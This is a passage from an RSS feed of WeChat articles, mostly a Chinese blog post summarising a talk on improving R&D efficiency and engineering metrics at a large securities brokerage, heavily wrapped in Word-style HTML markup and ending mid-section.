Light;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】李博士2019/2022的演讲，一个是社会宏观，一个是网络安全微观。从业者当然也可以从网安看社会和组织。跨学科很难，因为理论和技术的相互启发的渠道不直观，但大道至简，碰到值得神交的人物，就去琢磨。</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"> </span>    <o:page></o:page></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">======</span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">期待同仁一起学习交流，携手同行！加微信好友，请备注：姓名-单位-负责领域。</span></p><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 0pt;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000700" data-ratio="0.9836448598130841" data-type="png" data-w="428" height="194.0" width="198.0" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=05ec1e7e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAGYHdydibsqNjAo2KzHv0uXPkaHibhQqeSOCLfrnayqoV5gdqjLU19vEw%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span>    <o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484351">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=d4010aab&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247484351%26idx%3D1%26sn%3Dec9bdba22f6922e16a85ec574b7f01ce%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 29 Jul 2024 17:43:00 +0800</pubDate>
    </item>
    <item>
      <title>破局与重塑：一家头部券商的研发精益效能之路</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484067&amp;idx=1&amp;sn=7ef948aff1fd496d85ad1a8105d7b104</link>
      <description>从研发者的视角探索管理实践，注重现实案例而非抽象理论，谈笑间每一步都凝聚着对研发本质的深入思考，听众身临其境、感同身受、其乐融融。</description>
      <content:encoded><![CDATA[<p>
原创 <span>veni vidi vici</span> <span>2024-07-11 21:03</span> <span style="display: inline-block;">上海</span>
</p>

<p>从研发者的视角探索管理实践，注重现实案例而非抽象理论，谈笑间每一步都凝聚着对研发本质的深入思考，听众身临其境、感同身受、其乐融融。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=34447504&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINyzkHRvaibQAMpXF3Zh2dlHoFrFEKO5t2q7SbAbGWaMT2NmLL5DM4qUZ38KI78gtKuiaPzjxibbtoGiaA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">公司人力部提供了参加</span><a href="https://mp.weixin.qq.com/s?__biz=Mzg2NzE2NjAxNQ==&amp;mid=2247501429&amp;idx=1&amp;sn=b834693f9156329667c569a6d59472b4&amp;scene=21#wechat_redirect" style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;" data-linktype="2"><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">研发效能研讨会</span></a><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">的学习机会，半日聆听奋笔疾记，升维思考，觅得同道知音，慢慢放下怀疑主义者的傲娇，最大的感触是各大创新殊途同归，</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(217, 33, 66);">真正的变革并非仅仅是引入新技术，还重在日常细节中洞察人性，重塑组织的协作与文化</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">本文源自某头部券商资深技术领导者zlx的思考与实践，揭示研发效能提升背后的智慧与艰辛。开局时带着从武将转型文官的困惑，跨越传统项目转型险阻；中间经历了“度量</span><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">=</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">KPI”的巨大惯性，照搬经典的短暂试水、虚拟组织的“康威定律”困局；最后能行军布阵、步步为营地规划和执行，乃至全链路资产数字化重塑创新。</span><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">讲者摒弃了刻板的公文式套路，从研发者的视角探索管理实践，注重现实案例而非抽象理论，谈笑间每一步都凝聚着对研发本质的深入思考，听众身临其境、感同身受、其乐融融。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">让我们一同踏上这段启发性的旅程，领略头部券商如何在研发效能的道路上披荆斩棘，最终锻造出真正高效、灵活且富有创造力的组织。</span></section><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="358" valign="top" style="width:263.3pt;border-top:none;border-left:none;border-bottom:none;border-right:none;padding:4.0pt 4.0pt 4.0pt 4.0pt;"><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 24pt;font-family: 宋体;margin-bottom: 0px;margin-top: 0px;line-height: normal;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#14324D;">目录</span>
      </h1></td></tr><tr><td width="358" valign="top" style="width: 268.35pt;border-width: initial;border-style: none;border-color: initial;padding: 4pt;word-break: break-all;"><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">破局1：选择武将来做文官</span></strong><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">负责人的跨界感受</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">破局2：明知山有虎，偏向虎山行</span></strong><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">传统瀑布项目的转型：真正难点与高价值点</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">反思1：我本将心向明月，奈何明月照沟渠</span></strong><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">千万次强调度量不是KPI</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">度量的目标和意义</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">度量的真谛：从指标陷阱到价值驱动</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">反思2：上有政策，下有对策</span></strong><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">康威定律对虚拟组织和效能的挑战</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">反思3：看着地图摆阵势，纸上谈兵</span></strong><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">照搬经典难落地，企业学习需因地制宜</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">重塑1：大军未动，粮草先行</span></strong><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span>        <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">效能提升是数字化转型的前置工作</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">重塑2：磨刀不误砍柴工</span></strong><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">前期准备，优化协作标准，提升体验和效率</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">重塑3：温故而鼎新</span></strong><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">“平台的平台”就是平台工程</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><strong><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(172, 57, 255);">重塑4：一把钥匙开两把锁</span></strong><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">数字化的钥匙：全链路资产关联架构</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">制品与需求关联</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">    - </span><span style="font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">制品图谱 - 引以为豪的创新实践</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;"></span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"> </span></section></td></tr></tbody></table><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">破局1：选择武将来做文官</span></strong></span>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">负责人的跨界感受</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">选择一个有十几年开发实战经验、能做业务开发-交付-增长、自谦对“研发效能”是门外汉的少壮派，负责研发效能建设。负责人坦言感觉“挺难的”，不像做业务那么好汇报。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】永远不要怀疑老板的眼光和魄力。知人善任，得人者兴，结果确实是大开四方，让人耳目一新。</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;"></span></section><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">破局</span><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">2</span><span style="text-decoration: underline;font-size: 16pt;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">：</span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">明知山有虎，偏向虎山行</span></strong></span>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;">传统瀑布项目的转型：真正难点与高价值点</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">“现在发布一个牵扯到交易方面的需求，可能要七八个团队去配合，这里边有大量的沟通协作对齐……需要全局提升”</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">真正的研发效能提升应该聚焦于传统的、难以转型的项目，而不仅仅是已经相对敏捷的项目。这些传统项目，尤其是核心交易系统，往往涉及多个团队和复杂的协作过程，是效能提升的最大瓶颈，也是最具价值的改进点。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">要实现真正的效能提升，必须采取全局视角，将这些复杂项目及其相关环节全部纳入改进范围，而不是仅仅关注表面的敏捷性提升。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】和研发者一起想着如何共同进步，而不是空想着怎么“效能管理”研发人员</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">。</span></section><h1 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 24pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="text-decoration: underline;"><strong><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">反思</span><span style="text-decoration: underline;font-size: 16pt;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">1</span><span style="text-decoration: underline;font-size: 16pt;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">：</span><span style="text-decoration: underline;font-size: 16pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(20, 50, 77);">我本将心向明月，奈何明月照沟渠</span></strong></span>
  </h1><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;">千万次强调度量不是</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;">KPI</span>    <o:page></o:page></h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 